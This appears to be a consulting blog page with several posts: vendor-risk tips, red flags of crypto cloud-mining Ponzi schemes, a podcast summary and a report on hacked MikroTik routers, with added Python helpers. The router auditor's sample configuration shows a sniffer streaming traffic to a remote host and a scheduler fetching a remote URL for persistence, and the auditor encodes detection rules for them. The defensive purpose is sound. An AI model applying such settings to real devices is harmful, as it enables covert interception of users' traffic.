2) Ensure Your Vendors Perform Regular Security Assessments:

Risk assessments should be conducted on a weekly, monthly, or quarterly basis and reviewed and updated in response to changes in technology and the operating environment.

At a minimum, security risk assessments should include:

a) An evaluation of the likelihood and potential impact of risks to in-scope assets.

b) Measures instituted to protect against those risks.

c) Documentation of the security measures taken.

Vendors must also regularly review the findings of their risk assessments to determine the likelihood and impact of the risks they identify, and remediate any deficiencies.

Fig. 2. Stock Image, Third-Party Risk Mgmt Inputs, 2019.

3) Make Sure Vendors Have Written Information Security Policies / Procedures:

a) Written security policies and procedures should clearly outline the steps and tasks needed to ensure compliance delivers the expected outcomes.

b) Without a reference point, policies and procedures can become open to individual interpretation, leading to misalignment and mistakes. Verify not only that companies have these written policies, but that they align with your organization’s standards. Ask other peers in your industry for a benchmark.

4) Prioritize Vendors Based on Risk – Use Evidence and Input from Others – NOT Speculation:

a) Critical Risk: Vendors who are critical to your operation, and whose failure or inability to deliver contracted services could result in your organization’s failure.

b) High Risk: Vendors (1) who have access to customer data and have a high risk of information loss; and / or (2) upon whom your organization is highly dependent operationally.

c) Medium Risk: Vendors (1) whose access to customer information is limited; and / or (2) whose loss of services would be disruptive to your organization.

d) Low Risk: Vendors who do not have access to customer data and whose loss of services would not be disruptive to your organization.
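The four tiers above are a decision procedure, so they are worth writing down as one. The script below is an added illustration (not part of the original post) that applies those tier definitions to a vendor inventory. The field names, the review cadence assigned to each tier, and the sample vendors are assumptions; the one deliberate design choice is that a vendor with missing evidence is held at High and flagged, so that a gap in the record never quietly lowers a tier.

```python
"""Vendor risk tiering helper (added illustration; not from the original post).

Encodes the Critical / High / Medium / Low definitions so that every vendor is
tiered from recorded evidence (what customer data they can reach, how dependent
the business is on them) rather than from gut feel.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Ordered least to most severe so tiers can be sorted for prioritization.
TIERS = ("Low", "Medium", "High", "Critical")

# Assumed reassessment cadence per tier; the post only names weekly/monthly/quarterly.
REVIEW_CADENCE = {"Critical": "weekly", "High": "monthly", "Medium": "quarterly", "Low": "quarterly"}


@dataclass
class Vendor:
    name: str
    # "none", "limited" or "full" access to customer data; None = not yet evidenced
    customer_data_access: Optional[str]
    # "none", "disruptive", "high" or "critical" operational dependency; None = unknown
    operational_dependency: Optional[str]


def classify(v: Vendor) -> Tuple[str, List[str]]:
    """Return (tier, notes). Missing evidence is called out and the vendor is
    held at High until the gap is closed, so speculation never lowers a tier."""
    notes: List[str] = []
    data, dep = v.customer_data_access, v.operational_dependency
    if data not in ("none", "limited", "full"):
        notes.append("customer data access not evidenced")
    if dep not in ("none", "disruptive", "high", "critical"):
        notes.append("operational dependency not evidenced")
    if notes:
        return "High", notes
    if dep == "critical":                      # their failure could be our failure
        return "Critical", notes
    if data == "full" or dep == "high":        # customer data exposure or heavy dependency
        return "High", notes
    if data == "limited" or dep == "disruptive":
        return "Medium", notes
    return "Low", notes


def prioritize(vendors: List[Vendor]) -> List[dict]:
    """Rank vendors highest tier first and attach the review cadence for each."""
    rows = []
    for v in vendors:
        tier, notes = classify(v)
        rows.append({"vendor": v.name, "tier": tier, "cadence": REVIEW_CADENCE[tier], "notes": notes})
    rows.sort(key=lambda r: TIERS.index(r["tier"]), reverse=True)  # stable sort keeps input order within a tier
    return rows


# Constructed sample inventory (hypothetical vendors, not real suppliers).
SAMPLE_VENDORS = [
    Vendor("Core banking SaaS", "full", "critical"),
    Vendor("Payroll processor", "full", "disruptive"),
    Vendor("Office plant service", "none", "none"),
    Vendor("Marketing analytics", "limited", "none"),
    Vendor("New CRM plugin", None, "disruptive"),   # questionnaire not yet returned
]

if __name__ == "__main__":
    for row in prioritize(SAMPLE_VENDORS):
        print(f"{row['tier']:8} {row['cadence']:9} {row['vendor']}  {'; '.join(row['notes'])}")
```

Feed it the vendor list from tactic 1 and the output doubles as the assessment schedule for tactic 2; any row carrying a note is a due-diligence gap to close before the tier is trusted.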

5) Verify That Vendors Encrypt Data in All Applicable Places – At Rest, In Transit, etc:

a) Encryption, a process that protects data by making it unreadable without the use of a key or password, is one of the easiest methods of protecting data against theft.

b) When a vendor tells you their data is encrypted, trust but verify. Delve deeper and ask for details about each at-rest and in-transit scenario, including backups (what kind of backup, and whether it is encrypted too). Ask what type of encryption is used and request a diagram. Many vendor contacts cannot answer this in detail, which is itself a signal.

c) It is also imperative that the keys used to encrypt the data are very well protected. Understanding how encryption keys are protected is as vital as the encryption itself. Are they stored on the same server as the data they protect? If so, a compromise of that server exposes both, and the encryption adds little. Is multi-factor authentication needed to access them? Is there a time limit on how long someone can hold access to the key?

6) Ensure Vendors Have A Disaster Recovery Program:

To comply with the HIPAA Security Rule and related rules, vendors must have a detailed disaster recovery program that includes analysis of how a natural disaster, such as fire, flood, or even a rodent chewing through cables, could affect systems containing ePHI. The plan should also include policies and procedures for operating after a disaster, delineating employees’ roles and responsibilities. Finally, it should clearly set out the procedure for restoring the data.

7) Ensure Access Is Based on Legitimate Business Needs:

Fig 3. Stock Image, RBAC Flow, 2019.

It’s best to follow the principle of least privilege (POLP), which is the practice of limiting access rights for users to the bare minimum permissions they need to perform their work. Under POLP, users are granted permission to read, write, or execute only the files or resources they need to do their jobs. In other words, the least amount of privilege necessary. RBAC is worth mentioning here again.

8) Vet All New Vendors with Due Diligence:

a) Getting references.

b) Using a standard checklist.

c) Performing a risk analysis and determining if the vendor will be ranked Critical, High, Medium or Low.

d) Documenting and reporting to senior management.

Contact us here to learn more.

Eight Tips to Detect Crypto Mining Scams

Whether it’s Power Mining Pool today or Bitconnect yesterday, the crypto space is festering with parasitic scams and opportunistic swindlers. The conditions are ripe for them and there’s money to be made.

Fig. 1. BTCProMiner Free Scam research, 2018.

Among the dangers, Bitcoin mining scams are a tough one to identify and parting the good from the nasty can be tricky. Mining scams are wrapped up in an already technically demanding task of Bitcoin mining. They are billed as a consumer-friendly method for building exposure to Bitcoin mining, and when run like this, they really do provide value for investors looking to diversify.

Legit Bitcoin cloud mining pools are too often buried in search results and outranked by throngs of fly-by-night operations. Finding the legit pools can be a tall order and require sifting through Reddit posts and Bitcointalk forum entries. With that said, there are legit mining operations out there. As always, do your own research and stay skeptical as we settle and develop this wild frontier. For now, let’s take a look at what a crypto mining scam looks like to hopefully better prepare us to identify the key red flags.

What’s a Cloud Mining Pool?

A cloud mining pool is the most hands-off version of crypto mining you can get. It lets a participant rent or lease hashing power they do not own. The rented hashing power is then pooled and paid out proportionally to the members (after fees and operational costs).

A traditional mining pool instead requires participants to supply their own hashing power and pool it with other miners. The participant owns and operates their own hardware and contributes to the pool’s overall hashing power. The critical difference between a cloud mining pool and a traditional mining pool is the ownership of the hardware.

Cloud mining: you don’t own the hardware (hashing power).
Traditional mining: you own hardware (hashing power).

Why pool at all? In short, block rewards become harder to obtain as the overall hashing power of a particular blockchain increases. Take Bitcoin as an example. There was a time when a standard CPU could mine whole blocks by itself. Gone are those days. Bitcoin mining is now big business, with plenty of stakeholders leveraging their resources into the security of the blockchain. Miners with serious hashing power make it improbable for small miners to reasonably expect block rewards; their hashing power is simply not enough to compete.

The solution: gather together all these smaller players and pool their hashing power. Miners in a pool no longer compete for blocks of their own, instead, they work together and proportionally share the booty.

What’s a Ponzi Scheme?

It’s theft, let’s just clear that up. If you’re in a Ponzi scheme you are either being robbed or doing the robbing yourself. A typical Ponzi scheme involves enticing participants to invest their money in a fund or investment strategy with seemingly guaranteed returns. In reality, with some variation, the returns are not produced by real-world trading or superior business acumen. Instead, new investments into the fund are distributed to existing investors and represented as market returns.

Fig 2. General Ponzi Scheme Principles, 2018.
Ponzi schemes require a constant flow of new investment to keep the machine moving. Once new investment slows or things fall apart, the scheme is revealed for what it is. In the world of crypto, a collapsing Ponzi scheme is followed by a hasty exit scam.

Case in point: “A New York federal court has ordered cryptocurrency hedge fund Gelfman Blueprint, Inc. (GBI) and its CEO Nicholas Gelfman to pay over $2.5 million for operating a fraudulent Ponzi scheme, according to an official announcement published Oct. 18. GBI is a New York-based corporation and denominated Bitcoin (BTC) hedge fund incorporated in 2014. As stated on the company’s website, by 2015 it had 85 customers and 2,367 BTC under management. The order is the continuation of the initial anti-fraud enforcement action filed by the U.S. Commodity Futures Trading Commission (CFTC) against GBI in September 2017. The CFTC charged GBI for allegedly running a Ponzi scheme from 2014 to 2016, telling investors that it had developed a computer algorithm called “Jigsaw” which allowed for substantial returns through a commodity fund. In reality, the entire scheme was a fraud” (Cointelegraph.com, 10/19/18).

Keep in mind that Ponzi schemes thrive in times of economic expansion and speculative bubbles. Capturing collective optimism is pivotal to its success. Bitconnect is a choice example of the market fervor getting the best of investors.

Identifying the Red Flags of a Cloud Mining Ponzi Scheme

Firstly, the duck test. If it looks like a duck, swims like a duck, and quacks like a duck, then it probably is a duck. The duck test isn’t scientific by any standard but can be used to leverage your gut feeling to identify early warning signs. Ponzi schemes, whether in Wall Street, Main Street or Bitcoin mining pools, all share very common characteristics. If the opportunity you’re looking at is checking off the same boxes that previous Ponzi schemes had, it’s probably a duck.

Let’s take a look at some criteria or common characteristics of Bitcoin cloud mining Ponzi schemes.

**Much appreciation to Puppet on the BitcoinTalk forum for their work on this template to review Bitcoin cloud mining operations. Until this type of vetting is part of the investor process, crowd-sourced community led investigation is paramount.**

Red flags of a cloud mining Ponzi scheme (adapted from Puppet’s Criteria)

  1. No public mining address / Users unable to select own pools
    When you rent hashing power from a cloud miner, you are only renting hashing power. This means that the pool you contribute to should be your own choice. The cloud mining operator you rent from may also have a pool for convenience but should not require you to use it. There is no reason for a mining pool to hide their public mining address, it just doesn’t make sense.
  2. No endorsement from hardware/ASIC provider
    With the overwhelming majority of cloud mining operations being Ponzi schemes, the industry virtually requires a shout-out from the hardware provider to assure customers that there really are miners buzzing away on their behalf. If your cloud mining company can’t prove they own their hardware (without raising more questions), you should reconsider.
  3. No pictures or recordings of their hardware or datacenter
    It is common practice for miners to be closed lipped about where their data centers are located. So, don’t expect to get robust images or recordings that dox the facility or owners. However, some evidence should exist and beyond their location, the pictures or video shouldn’t look to be hiding anything.
  4. No limits on how much hashing power you can lease
    Cloud mining providers have a limited inventory of hashing power on hand at any time. Furthermore, expanding an operation’s inventory takes time and is constrained by the market supply of ASICs and other factors. It is questionable for a cloud miner not to share its inventory with customers. Most concerning, offenders will promise you instant and limitless scalability.
  5. Referral payouts schemes
    Often, mining Ponzi schemes will also feature a form of multi-level marketing to encourage members to bring on new investments. Members are incentivized to grow their own teams, and each new member they bring in increases their rewards.
  6. Anon operators
    If the owners are anonymous, move on. There is little-to-no reason to be an anonymous operator of a cloud mining service. If they provide identification, double check it, ask around, and do some due diligence. Is the owner hidden behind private registration? Has the domain been registered for less than six months? (You can find this information by searching for the platform’s URL registration details on a site like WHOis.net). The more information you can find about the people/company behind a website, the better.
  7. No clear path for divesting
    There should be well-defined methods for withdrawing funds or closing rental contracts.
  8. Guaranteed profits
    Quack, quack, quack!

If any of these red flags are present in a cloud mining business, take a moment and consider why.
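Red flag 6 gives two checks a reader can run mechanically against the WHOIS record: how old the domain is, and whether the registrant hides behind a privacy service. The script below is an added example, not part of the original article; it parses a WHOIS response the way a human reading it would. The WHOIS text is constructed for the example (the domain, dates and registrar are made up), the 180-day threshold follows the "less than six months" rule above, and the list of privacy-service keywords is an assumption. To check a real site, paste the output of `whois <domain>` in place of the sample.

```python
"""WHOIS red-flag check (added illustration, not from the original article).

Answers two of the red-flag-6 questions from a WHOIS response: how long has
the domain existed, and is the registrant hidden behind a privacy service?
"""
import re
from datetime import date, datetime

# Assumed markers for common registrant-privacy / proxy services.
PRIVACY_MARKERS = ("privacy", "proxy", "whoisguard", "redacted", "domains by proxy", "withheld")

# Constructed sample WHOIS output (not a real registration record).
SAMPLE_WHOIS = """\
Domain Name: EXAMPLE-MINING-POOL.COM
Registry Domain ID: 0000000000_DOMAIN_COM-VRSN
Creation Date: 2017-06-27T14:02:11Z
Registry Expiry Date: 2018-06-27T14:02:11Z
Registrar: Example Registrar, Inc.
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Domains By Proxy, LLC
Admin Email: please query the RDDS service
"""


def creation_date(whois_text: str) -> date:
    """Pull the creation date; registries label it differently, so try each form."""
    for label in ("Creation Date", "Created On", "Registered On", "created"):
        m = re.search(rf"^{label}:\s*(\d{{4}}-\d{{2}}-\d{{2}})", whois_text, re.M | re.I)
        if m:
            return datetime.strptime(m.group(1), "%Y-%m-%d").date()
    raise ValueError("no creation date found in WHOIS text")


def uses_privacy_service(whois_text: str) -> bool:
    """True if any registrant/admin/tech contact line names a privacy or proxy service."""
    for line in whois_text.splitlines():
        if re.match(r"^(Registrant|Admin|Tech)\b", line, re.I):
            if any(marker in line.lower() for marker in PRIVACY_MARKERS):
                return True
    return False


def red_flags(whois_text: str, as_of_iso: str, min_age_days: int = 180) -> dict:
    """Return the domain age as of `as_of_iso` (YYYY-MM-DD) and which flags fire."""
    as_of = date.fromisoformat(as_of_iso)
    created = creation_date(whois_text)
    age = (as_of - created).days
    return {
        "created": created.isoformat(),
        "age_days": age,
        "young_domain": age < min_age_days,      # red flag 6: registered under six months ago
        "hidden_registrant": uses_privacy_service(whois_text),  # red flag 6: anonymous operator
    }


if __name__ == "__main__":
    # Checked as of the day the sample site "launched", mirroring the case study below.
    for key, value in red_flags(SAMPLE_WHOIS, as_of_iso="2017-09-04").items():
        print(f"{key}: {value}")
```

Both flags firing is not proof of a scam on its own (many legitimate small businesses use registrar privacy), but a weeks-old domain plus a hidden registrant plus guaranteed returns is the duck test in three lines.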

Power Mining Pool: A Case Study for Cloud Mining Ponzi Schemes

Power Mining Pool was a typical Bitcoin mining pool Ponzi scheme and even included a multi-level marketing (MLM) styled referral system. Looking back it is a lot easier now to see the red flags that were present then. Hindsight is twenty-twenty. When a company expects you to send them money, but refuses to disclose any information about itself, you’re almost certainly being scammed. A WHOIS checkup shows that PowerMiningPool.com domain was registered on June 27, and the mining pool website launched online on September 4, 2017.

BitCoin Mining Scam

Red Flag #1 Power Mining Pool didn’t have a public mining address and didn’t allow for mining outside their own pool.

Red Flag #2 No endorsement or sign of approval from hardware suppliers. Nothing to be found on Reddit, Telegram, BitcoinTalk, and so on.

Red Flag #3 A serious lack of informative images. An archive of the Power Mining Pool site shows a website riddled with stock images and vague copywriting. In addition to the generic images, there is a video that provides no additional insight into the company.

Red Flag #4 No limits to how much you can invest. Power Mining Pool sold hashing power in the form of shares, which any investor could purchase without limit. Shares would not only be your claim to the guaranteed returns but also provide you with more ability to climb the ranks of the MLM reward system.

Red Flag #5 From Associate to President Millionaire, members could climb the ranks by both acquiring new shares in the pool and successfully referring new members. At each new rank in membership, you received bonuses and higher returns. For you to move up in ranks, however, your referrals also needed to move up. Not only do you need to bring in new successful members, but your referrals do too. Sound familiar?

Red Flag #6 The founders of Power Mining Pool are brothers and live in central Europe. And that’s all the information available. Searching their names, Andrew and Mike Conti, is about as helpful as the caricatures of themselves on their about page. Additionally, a WHOIS search of the company’s domain shows the admin contacts hidden behind a domain name privacy service.

Red Flag #7 After the cease and desist, Power Mining Pool has up and left with members’ principal investments. Initially, there were accounts of members receiving their daily mining profits as promised. However, it’s common for early adopters of Ponzi schemes to see earnings while their principal investments are siphoned off.

Red Flag #8 “Every share you purchase will earn you €70.” That’s a promise plucked directly from the former subpage subtly titled opportunities. Each share costs members €50 which means Power Mining Pool is guaranteeing 40 percent returns.

Power Mining Pool is only one example of a Bitcoin cloud mining service riddled with red flags and warning signs. In fact, there are breadcrumbs of evidence linking Power Mining Pool to other operational Bitcoin cloud mining scams. Battling these schemes is a game of whack-a-mole: closing down one just creates three more.

Conclusion

The code is what makes a cryptocurrency work, and most legitimate cryptocurrency teams make their code open source. This means it is published openly, so anyone can read it, modify it, and check that it is what the founders say it is. Of course, just because you can’t read the code yourself doesn’t mean not being able to see it is OK. If a cryptocurrency team keeps its code secret, that should set off alarm bells. Unless they have validated IP, what are they trying to hide? And even then, they would have legal paperwork and patent documents they could show.

Just because red flags are present doesn’t always mean you have identified a scam. They are early warning signs telling us to look a little deeper, investigate further, and remain skeptical. Questions and suspicions are not inherently dangerous; ignoring them is. Power Mining Pool was peppered with reasons to raise concern and seek clarity. The answers to these questions should point to a unique technological offering and business savvy, and it should all be logically connected. If operators don’t directly answer most of these questions, see whether they share other traits with known crypto scams, as it may be another example in a long line of Bitcoin cloud mining Ponzi schemes. BitClub Network, HashOcean, Coinmulitplier Club, MinersLab, and Bitcoin Cloud Services are just a handful of other examples. Unscrupulous operators are swindling and cheating people out of their money. If you see reasons to be concerned, share them with the community, ask the operators for clarity, and be cautious. Don’t keep it a secret.

Editor Jeremy Swenson
Writer Marshall Taylor

Abstract Forward Podcast #4: Network Scanning Tips With Chip Harris.

In this episode, we have a deep conversation with CISO consultant Chip Harris. We start with an overview of network scanning, covering both free open source tools like OpenVAS and costlier options like Tenable. We then talk about red teaming, issues with security data lakes, the Equifax data breach, how leadership impacts security, and how threat actors are typically better at innovating than defenders. We also cover the evolution of messaging, mobile device application hype and exploits, mobile application containerization, how the cyber kill chain came about, and a few things about the future of incident response.

Harris has an extensive background in government and business InfoSec engineering and red team planning and operations  — with over 25 years of experience designing and managing IT systems. His expertise is in identifying and solving problems by delivering projects and solutions. His experience includes serving as the IT lead and project manager within the business unit, evaluating system performance, helping business leaders and non-technical clients understand how technology can improve workflow, developing and enforcing standard IT practices, and ensuring IT compliance with regulations such as NERC CIP, PCI, GDPR, HIPAA, and SOX.

He has a Ph.D. in Cyber Security and Cyber Operations from the United States War College, a Masters in Cyber Security and Cyber Crime from the United States War College, and a Bachelors in Computer Science and Animation from Memphis College of Art. He has the following certifications: MCE, MCSE, NCE, MCSA, MCM, MCT, Security +, SUSE Novell Linux, Open SUSE Enterprise, Ubuntu Server Admin, PICK WMS, Backtrack 5, Netools 5, Dell Kace 3000 and 1000, IBM Q-Radar, Carbon Black, Tenable Security Suite, Dark Trace, Q-Radar, IBM Guardium, OWASP, Check Point, RHL, Kali Linux Certified, C|EH, C|PT, C|HFI, CCE, GIAC Rated, Barracuda, and he is even Tripwire Certified.

Fig 1. (OpenVAS Greenbone Scan Demo, 2018).

Listen to the podcast here.


Learn more about Abstract Forward Consulting here.


Thousands of MikroTik Routers Hacked to Spy On Network Traffic

At present, more than 7,500 MikroTik routers have been compromised: attackers reconfigured the devices to forward network traffic to a handful of IP addresses under their control (Shaun Nichols, The Register, 09/04/18). According to Chinese security research firm 360 Netlab, the attackers obtained access to the devices by exploiting CVE-2018-14847. Ironically, a patch for this vulnerability had been available since April 2018.

CVE-2018-14847 is a Winbox “any directory file read” vulnerability in MikroTik RouterOS. Together with a Webfig remote code execution bug in the same product, it was exploited by Chimay Red, a hacking tool exposed in the CIA Vault 7 leak.

Since 08/24/18 the 360 Netlab honeypot network had picked up on more than 5 million devices with an open TCP/8291 port worldwide, of which 1.2 million are MikroTik devices. Out of those, about 31 percent, or 370,000, are vulnerable to the flaw (Tara Seals, Threatpost, 09/04/18).

The infection does not appear to target any one country: the hacked devices are spread across five continents, with Russia, Iran, Brazil, and India the most affected. The top 10 countries with compromised MikroTik routers are (Ms. Smith, CSO Online, 09/04/18):

  1. 1,628 in Russia
  2. 637 in Iran
  3. 615 in Brazil
  4. 594 in India
  5. 544 in Ukraine
  6. 375 in Bangladesh
  7. 364 in Indonesia
  8. 218 in Ecuador
  9. 191 in the US
  10. 189 in Argentina

The researchers noted that the malware is also resilient to reboots, leaving a firmware update as the only permanent solution to the problem (Shaun Nichols, The Register, 09/04/18). “In order for the attacker to gain control even after device reboot (IP change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker’s URL,” Netlab writes.

Also, the attackers seek to infect victims with the browser-based Coinhive cryptomining script (Fig. 1). They achieve this by redirecting the HTTP proxy settings to an error page they created, where they placed the mining script. “By doing this, the attacker hopes to perform web mining for all the proxy traffic on the users’ devices,” 360 Netlab researchers indicated.


However, the attackers made a mistake when they set up proxy access control lists that block all external web resources, including those required for the mining operation (Fig. 1).

360 Netlab says it does not know what the attacker’s ultimate goal is. Its analysis shows the attacker is particularly interested in ports 20, 21, 25, 110, and 144, which the researchers mapped to FTP-data, FTP, SMTP, POP3, and IMAP traffic (note that IMAP’s standard port is 143; 144 is the port the researchers reported). There is also an unusual interest in traffic on SNMP (Simple Network Management Protocol) ports 161 and 162, which the researchers could not explain at the time (Shaun Nichols, The Register, 09/04/18).

“This deserves some questions, why the attacker is paying attention to the network management protocol regular users barely use? Are they trying to monitor and capture some special users’ network SNMP community strings?” 360 Netlab asks.

Bleeping Computer’s reporting recommends that MikroTik users install the latest firmware version on the device. Based on the indicators 360 Netlab published, users can also check whether the HTTP proxy, SOCKS4 proxy, and network traffic capture (packet sniffer) features are enabled and being abused by a malicious actor (Ionut Ilascu, Bleeping Computer, 09/04/18).
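The indicators above (HTTP proxy and SOCKS proxy switched on, the sniffer streaming captured traffic to a remote host, a scheduler job fetching a remote URL to survive reboots) all show up in a RouterOS configuration export. The script below is an added example, written for this page and not taken from 360 Netlab or the articles cited; it scans the text of `/export` for those four settings. The export text is constructed for the example: the RFC 5737 addresses and the URL in it are placeholders, not indicators from the real campaign, and the `redirect-to` check is an assumption about how an injected proxy error page would appear.

```python
"""Audit a RouterOS `/export` dump for the post-compromise settings described above.

Added illustration, not 360 Netlab's or MikroTik's code. Flags: HTTP/SOCKS proxy
enabled, proxy access rules that redirect traffic, the packet sniffer streaming
to a remote server, and a scheduler entry that runs /tool fetch against a URL.
"""
import re
from typing import Iterator, List, Tuple

# Constructed sample export from a hypothetical compromised device.
SAMPLE_EXPORT = """\
# sep/04/2018 10:00:00 by RouterOS 6.40.1
/ip proxy
set enabled=yes port=8080
/ip proxy access
add action=deny dst-port=80 redirect-to=192.0.2.10:8080
/ip socks
set enabled=yes port=4153
/tool sniffer
set filter-ip-protocol=tcp filter-port=20,21,25,110,144,161,162 \\
    streaming-enabled=yes streaming-server=192.0.2.20
/system scheduler
add interval=30s name=report on-event="/tool fetch url=http://192.0.2.30/report mode=http"
/ip service
set winbox port=8291
"""


def _sections(export_text: str) -> Iterator[Tuple[str, List[str]]]:
    """Yield (menu path, command lines) pairs; backslash line continuations are joined."""
    joined = re.sub(r"\\\n\s*", " ", export_text)
    menu, lines = None, []  # type: ignore[var-annotated]
    for raw in joined.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):            # a new menu such as "/ip proxy"
            if menu is not None:
                yield menu, lines
            menu, lines = line, []
        else:
            lines.append(line)
    if menu is not None:
        yield menu, lines


def audit_export(export_text: str) -> List[Tuple[str, str]]:
    """Return (indicator, offending line) pairs for each suspicious setting found."""
    findings: List[Tuple[str, str]] = []
    for menu, lines in _sections(export_text):
        for line in lines:
            if menu in ("/ip proxy", "/ip socks") and "enabled=yes" in line:
                findings.append((f"{menu} enabled", line))
            elif menu == "/ip proxy access" and "redirect-to=" in line:
                findings.append(("proxy redirect (possible injected error page)", line))
            elif menu == "/tool sniffer" and "streaming-enabled=yes" in line:
                m = re.search(r"streaming-server=(\S+)", line)
                findings.append((f"sniffer streaming to {m.group(1) if m else '?'}", line))
            elif menu == "/system scheduler" and "/tool fetch" in line:
                findings.append(("scheduler fetching remote URL (reboot persistence)", line))
    return findings


if __name__ == "__main__":
    for indicator, line in audit_export(SAMPLE_EXPORT):
        print(f"[!] {indicator}\n    {line}")
```

A clean device returns an empty list; any finding is a reason to pull the export off the box, reset the configuration, and upgrade, since the scheduler entry shows why a reboot alone does not clear the infection.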

Reach out to my company Abstract Forward Consulting if you have questions.